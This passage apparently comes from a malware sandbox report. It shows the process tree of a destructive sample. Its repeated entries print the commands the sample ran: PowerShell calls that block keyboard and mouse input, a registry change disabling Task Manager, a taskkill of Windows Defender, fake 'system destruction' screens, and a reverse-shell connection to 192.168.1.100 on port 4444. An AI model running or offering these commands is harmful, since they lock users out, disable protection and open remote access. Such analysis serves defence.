        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        67⤵
        
        PID:8516
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rvnmmj0h\rvnmmj0h.cmdline"
        68⤵
        
        PID:8708
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B96.tmp" "c:\Users\Admin\AppData\Local\Temp\rvnmmj0h\CSC1471FB4B6E194971B7F46DE29080D58E.TMP"
        69⤵
        
        PID:8552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        67⤵
        
        PID:1116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        67⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        67⤵
        
        PID:7580
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        67⤵
        Kills process with taskkill
        
        PID:3120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        65⤵
        
        PID:7788
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jabm1kqr\jabm1kqr.cmdline"
        66⤵
        
        PID:5480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        65⤵
        
        PID:6256
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\js1iby3u\js1iby3u.cmdline"
        66⤵
        
        PID:8592
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A4E.tmp" "c:\Users\Admin\AppData\Local\Temp\js1iby3u\CSC3D191689F4E248EFB9D4ADFF16D67B7.TMP"
        67⤵
        
        PID:5312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        65⤵
        
        PID:8436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        65⤵
        
        PID:6252
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wzvyedrn\wzvyedrn.cmdline"
        66⤵
        
        PID:9108
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7376.tmp" "c:\Users\Admin\AppData\Local\Temp\wzvyedrn\CSCB8B7CBFA9FD48FBA6BC9C502DC47331.TMP"
        67⤵
        
        PID:6492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        65⤵
        
        PID:6768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        65⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        63⤵
        
        PID:5616
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kxb2kdyi\kxb2kdyi.cmdline"
        64⤵
        
        PID:2408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        63⤵
        
        PID:4820
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cy55inth\cy55inth.cmdline"
        64⤵
        
        PID:3496
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES58D9.tmp" "c:\Users\Admin\AppData\Local\Temp\cy55inth\CSCFD231311F4249F6906E59328A59CAE5.TMP"
        65⤵
        
        PID:6108
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        63⤵
        
        PID:8288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        63⤵
        
        PID:8624
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2zi0mvlz\2zi0mvlz.cmdline"
        64⤵
        
        PID:3380
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6145.tmp" "c:\Users\Admin\AppData\Local\Temp\2zi0mvlz\CSC29F532F8A3B542B9B8E6A638112BEF1E.TMP"
        65⤵
        
        PID:7564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        63⤵
        
        PID:9020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        63⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        61⤵
        
        PID:5904
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pd1aosqx\pd1aosqx.cmdline"
        62⤵
        
        PID:3352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        61⤵
        
        PID:6572
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5yffpy4l\5yffpy4l.cmdline"
        62⤵
        
        PID:8412
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D4E.tmp" "c:\Users\Admin\AppData\Local\Temp\5yffpy4l\CSC84FDA485606846819C423D72A78EE431.TMP"
        63⤵
        
        PID:8512
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        61⤵
        
        PID:9056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        61⤵
        
        PID:8228
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hzk31iun\hzk31iun.cmdline"
        62⤵
        
        PID:8956
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6472.tmp" "c:\Users\Admin\AppData\Local\Temp\hzk31iun\CSC1C61FB0456524DB0B7D92C8BC3E27E80.TMP"
        63⤵
        
        PID:8244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        61⤵
        
        PID:7804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        59⤵
        
        PID:6104
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vln1vwjo\vln1vwjo.cmdline"
        60⤵
        
        PID:5036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        59⤵
        
        PID:6552
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tksmi01c\tksmi01c.cmdline"
        60⤵
        
        PID:8056
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES561A.tmp" "c:\Users\Admin\AppData\Local\Temp\tksmi01c\CSC452F832469C346EF84F192EC6D59152.TMP"
        61⤵
        
        PID:6452
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        59⤵
        
        PID:4468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        59⤵
        
        PID:4872
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sam5tyqk\sam5tyqk.cmdline"
        60⤵
        
        PID:8752
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F9F.tmp" "c:\Users\Admin\AppData\Local\Temp\sam5tyqk\CSC28F53EC33FD4ED09AB915921E3E3DB.TMP"
        61⤵
        
        PID:8836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        59⤵
        
        PID:7936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        57⤵
        
        PID:5372
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tagwbdo2\tagwbdo2.cmdline"
        58⤵
        
        PID:6832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        57⤵
        
        PID:7896
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tsaagw4m\tsaagw4m.cmdline"
        58⤵
        
        PID:7484
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40EC.tmp" "c:\Users\Admin\AppData\Local\Temp\tsaagw4m\CSCE27F82D7AC7B4FC1BB65D38C6EA7B97.TMP"
        59⤵
        
        PID:8116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        57⤵
        
        PID:8116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        57⤵
        
        PID:6448
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\etugptsq\etugptsq.cmdline"
        58⤵
        
        PID:5828
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4BE9.tmp" "c:\Users\Admin\AppData\Local\Temp\etugptsq\CSCF78816FA6E0F4433A71A17FAC99DE112.TMP"
        59⤵
        
        PID:6312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        57⤵
        
        PID:7432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        55⤵
        
        PID:5864
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\agyngdnw\agyngdnw.cmdline"
        56⤵
        
        PID:1832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        55⤵
        
        PID:6536
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mcxcwg3b\mcxcwg3b.cmdline"
        56⤵
        
        PID:7356
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES459F.tmp" "c:\Users\Admin\AppData\Local\Temp\mcxcwg3b\CSC4F9C956D73534C92925F4852D30517.TMP"
        57⤵
        
        PID:7100
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        55⤵
        
        PID:7296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        55⤵
        
        PID:7420
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zhelojdy\zhelojdy.cmdline"
        56⤵
        
        PID:4560
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F25.tmp" "c:\Users\Admin\AppData\Local\Temp\zhelojdy\CSC20EEFD7710714A0F8B74804C92BD2ED.TMP"
        57⤵
        
        PID:8028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        55⤵
        
        PID:5312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        53⤵
        
        PID:6244
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0xevyzhd\0xevyzhd.cmdline"
        54⤵
        
        PID:6268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        53⤵
        
        PID:6632
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0rp1kema\0rp1kema.cmdline"
        54⤵
        
        PID:5500
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3488.tmp" "c:\Users\Admin\AppData\Local\Temp\0rp1kema\CSC11518051B302458498A51B1E0AAB367.TMP"
        55⤵
        
        PID:7740
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        53⤵
        
        PID:5488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        53⤵
        
        PID:5284
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\su3sqfvo\su3sqfvo.cmdline"
        54⤵
        
        PID:8036
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B8D.tmp" "c:\Users\Admin\AppData\Local\Temp\su3sqfvo\CSCB97A78B62D054420925757BA2AC42CB.TMP"
        55⤵
        
        PID:6928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        53⤵
        
        PID:6224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        51⤵
        
        PID:6912
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
